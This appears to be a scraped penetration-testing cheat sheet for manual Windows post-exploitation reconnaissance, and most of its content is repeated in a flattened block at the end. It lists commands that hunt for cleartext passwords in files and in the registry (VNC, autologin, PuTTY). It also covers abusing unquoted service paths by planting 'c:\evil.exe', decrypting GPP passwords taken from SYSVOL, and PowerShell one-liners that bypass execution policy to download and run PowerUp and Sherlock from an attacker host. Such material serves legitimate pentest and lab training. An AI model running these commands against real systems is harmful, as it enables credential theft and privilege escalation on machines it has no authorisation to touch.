Windows enumeration

Manual post exploitation recon for windows targets

#Basics

#systeminfo
hostname

# Who am I?
whoami
echo %username%

# What users/localgroups are on the machine?
net users
net localgroups

# More info about a specific user. Check if user has privileges.
net user user1

# View Domain Groups
net group /domain

# View Members of Domain Group
net group /domain <Group Name>

# Firewall
netsh firewall show state
netsh firewall show config

# Network
ipconfig /all
route print
arp -A

# How well patched is the system?
wmic qfe get Caption,Description,HotFixID,InstalledOn

#Cleartext passwords

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

#Find all those strings in config files.
dir /s *pass* == *cred* == *vnc* == *.config*

# Find all passwords in all files.
findstr /spin "password" *.*
findstr /spin "password" *.*

#Passwords in files

c:\sysprep.inf
c:\sysprep\sysprep.xml
c:\unattend.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml

dir c:\*vnc.ini /s /b
dir c:\*ultravnc.ini /s /b 
dir c:\ /s /b | findstr /si *vnc.ini

#Passwords in registry

# VNC
reg query "HKCU\Software\ORL\WinVNC3\Password"

# Windows autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"

# SNMP Paramters
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"

# Putty
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"

# Search for password in registry
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

#Checking for Kernel exploits

systeminfo
# or
wmic qfe get Caption,Description,HotFixID,InstalledOn

#Scheduled tasks

schtasks /query /fo LIST /v

#Weak service permissions

#will spit out a ton of output

wmic service list brief

#To prune the output into something more manageable,leverage wimc and icalcs 
from C:\Windows\temp  | try:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt

Then:

for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"

#sc.exe

sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt

FOR /F %i in (Servicenames.txt) DO echo %i
type Servicenames.txt

FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt

FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

#Unquoted service paths:If the path contains a space and is not quoted,the service is vulnerable.

# Using WMIC
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

# Using sc
sc query
sc qc service name

# Look for Binary_path_name and see if it is unquoted.

#Example of an unquoted executable:
c:\Program Files\something\winamp.exe

#We can place a payload like this: 

c:\evil.exe

#There is also a metasploit module: 
exploit/windows/local/trusted_service_path

#Check for vulnerable drivers

# List all drivers
driverquery

#Group policy preferences

# Output environment-variables
set

# Look for the following:
LOGONSERVER=\\NAMEOFSERVER
USERDNSDOMAIN=EXAMPLE.LOCAL

# Look up ip-addres
nslookup nameofserver.example.local

# It will output something like this
Address:  192.168.1.101

# Now you can mount it
net use z: \\192.168.1.101\SYSVOL

# Enter
z:

# Now search for the groups.xml file
dir Groups.xml /s

#If an encrypted password is found , exfile to kali and crack:

gpp-decrypt encryptedpassword

#Pint test blind RCE

C:\Windows\System32\cmd.exe /c ping 10.10.10.10
# on linux box: 
tcpdump -i tun0 icmp

#Same if powershell is available

C:\Windows\SysNative\WindowsPowerShell\v1.0\powershell.exe ping 10.10.10.10

#Firewall / AV / Defender

netsh firewall show state  
netsh firewall show config  
Sc query windefend
Netsh advfirewall firewall dump, netsh firewall show state

#Automated tools checklist

#Run winpeas 
Run PowerUp.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerUp.ps1');Invoke-AllChecks"

#Run Sherlock.ps1
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Sherlock.ps1');Find-AllVulns"

#Run JAWS

# Executables  
WinPEAS.exe /.bat * 
Seatbelt.exe 
Watson.exe * 
Sharpup.exe 
windows-privesc-check2.exe --dump -G

#Powershell 
Sherlock.ps1 * 
PowerUp.ps1 * 
jaws-enumps1 * 


#Other 
Windows-exploit-suggester.py *
Systeminfo -> a text file and run it with windows exploit suggester.py, search for exploit in SecWiki github 

MSF exploit suggester *
In a meterpreter session – run /post/multi/recon/local_exploit_suggester - > shows list of kernel

Previous'Nix file transfers NextAutomated scripts

Last updated 2 years ago

#systeminfo hostname # Who am I? whoami echo %username% # What users/localgroups are on the machine? net users net localgroups # More info about a specific user. Check if user has privileges. net user user1 # View Domain Groups net group /domain # View Members of Domain Group net group /domain <Group Name> # Firewall netsh firewall show state netsh firewall show config # Network ipconfig /all route print arp -A # How well patched is the system? wmic qfe get Caption,Description,HotFixID,InstalledOn

findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini #Find all those strings in config files. dir /s *pass* == *cred* == *vnc* == *.config* # Find all passwords in all files. findstr /spin "password" *.* findstr /spin "password" *.*

c:\sysprep.inf c:\sysprep\sysprep.xml c:\unattend.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml dir c:\*vnc.ini /s /b dir c:\*ultravnc.ini /s /b dir c:\ /s /b | findstr /si *vnc.ini

# VNC reg query "HKCU\Software\ORL\WinVNC3\Password" # Windows autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # SNMP Paramters reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # Putty reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s

#will spit out a ton of output wmic service list brief #To prune the output into something more manageable,leverage wimc and icalcs from C:\Windows\temp | try: for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> c:\windows\temp\permissions.txt Then: for /f eol^=^"^ delims^=^" %a in (c:\windows\temp\permissions.txt) do cmd.exe /c icacls "%a"

sc query state= all | findstr "SERVICE_NAME:" >> Servicenames.txt FOR /F %i in (Servicenames.txt) DO echo %i type Servicenames.txt FOR /F "tokens=2 delims= " %i in (Servicenames.txt) DO @echo %i >> services.txt FOR /F %i in (services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> path.txt

# Using WMIC wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ # Using sc sc query sc qc service name # Look for Binary_path_name and see if it is unquoted. #Example of an unquoted executable: c:\Program Files\something\winamp.exe #We can place a payload like this: c:\evil.exe #There is also a metasploit module: exploit/windows/local/trusted_service_path

# Output environment-variables set # Look for the following: LOGONSERVER=\\NAMEOFSERVER USERDNSDOMAIN=EXAMPLE.LOCAL # Look up ip-addres nslookup nameofserver.example.local # It will output something like this Address: 192.168.1.101 # Now you can mount it net use z: \\192.168.1.101\SYSVOL # Enter z: # Now search for the groups.xml file dir Groups.xml /s #If an encrypted password is found , exfile to kali and crack: gpp-decrypt encryptedpassword

#Run winpeas Run PowerUp.ps1 powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/PowerUp.ps1');Invoke-AllChecks" #Run Sherlock.ps1 powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Sherlock.ps1');Find-AllVulns" #Run JAWS # Executables WinPEAS.exe /.bat * Seatbelt.exe Watson.exe * Sharpup.exe windows-privesc-check2.exe --dump -G #Powershell Sherlock.ps1 * PowerUp.ps1 * jaws-enumps1 * #Other Windows-exploit-suggester.py * Systeminfo -> a text file and run it with windows exploit suggester.py, search for exploit in SecWiki github MSF exploit suggester * In a meterpreter session – run /post/multi/recon/local_exploit_suggester - > shows list of kernel